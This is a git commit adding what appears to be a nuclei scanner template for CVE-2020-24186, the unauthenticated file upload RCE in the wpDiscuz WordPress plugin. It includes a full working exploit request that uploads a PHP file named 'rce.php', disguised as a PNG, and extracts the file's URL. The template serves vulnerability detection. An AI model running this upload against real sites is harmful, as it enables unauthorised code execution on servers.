Merge pull request #984 from Ganofins/patch-2

Create CVE-2020-24186.yaml
2021-03-14 19:59:20 +05:30 · 2021-03-14 19:59:20 +05:30 · 25c4ef93bc
parent 8e175ef59d 9848b3b671
commit 25c4ef93bc
2 changed files with 91 additions and 1 deletions
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@ -0,0 +1,89 @@
+id: CVE-2020-24186
+
+info:
+  name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
+  author: Ganofins
+  severity: critical
+  description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
+  reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
+  tags: cve,cve2020,wordpress,wp-plugin,rce
+
+requests:
+  - raw:
+      - |
+        GET /?p=1 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Connection: close
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 745
+        Accept: */*
+        X-Requested-With: XMLHttpRequest
+        sec-ch-ua-mobile: ?0
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
+        Origin: {{BaseURL}}
+        Sec-Fetch-Site: same-origin
+        Sec-Fetch-Mode: cors
+        Sec-Fetch-Dest: empty
+        Referer: {{BaseURL}}
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+        Connection: close
+
+        ------WebKitFormBoundary88AhjLimsDMHU1Ak
+        Content-Disposition: form-data; name="action"
+
+        wmuUploadFiles
+        ------WebKitFormBoundary88AhjLimsDMHU1Ak
+        Content-Disposition: form-data; name="wmu_nonce"
+
+        {{wmuSecurity}}
+        ------WebKitFormBoundary88AhjLimsDMHU1Ak
+        Content-Disposition: form-data; name="wmuAttachmentsData"
+
+        undefined
+        ------WebKitFormBoundary88AhjLimsDMHU1Ak
+        Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
+        Content-Type: image/png
+
+        {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
+        <?php phpinfo();?>
+        ------WebKitFormBoundary88AhjLimsDMHU1Ak
+        Content-Disposition: form-data; name="postId"
+
+        1
+        ------WebKitFormBoundary88AhjLimsDMHU1Ak--
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: wmuSecurity
+        group: 1
+        regex:
+          - 'wmuSecurity":"([a-z0-9]+)'
+
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"url":"([a-z:\\/0-9-.]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'success":true'
+          - 'fullname'
+          - 'shortname'
+          - 'url'
+        condition: and
+        part: body
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@ -20,6 +20,7 @@ workflows:
          - template: cves/2019/CVE-2019-19985.yaml
          - template: cves/2019/CVE-2019-20141.yaml
          - template: cves/2020/CVE-2020-11738.yaml
+          - template: cves/2020/CVE-2020-24186.yaml
          - template: cves/2020/CVE-2020-24312.yaml
          - template: cves/2020/CVE-2020-25213.yaml
          - template: cves/2020/CVE-2020-13700.yaml
@ -49,4 +50,4 @@ workflows:
          - template: vulnerabilities/wordpress/wp-enabled-registration.yaml
          - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
          - template: vulnerabilities/wordpress/wp-uploads-listing.yaml
-          - template: vulnerabilities/wordpress/wp-license-file.yaml
+          - template: vulnerabilities/wordpress/wp-license-file.yaml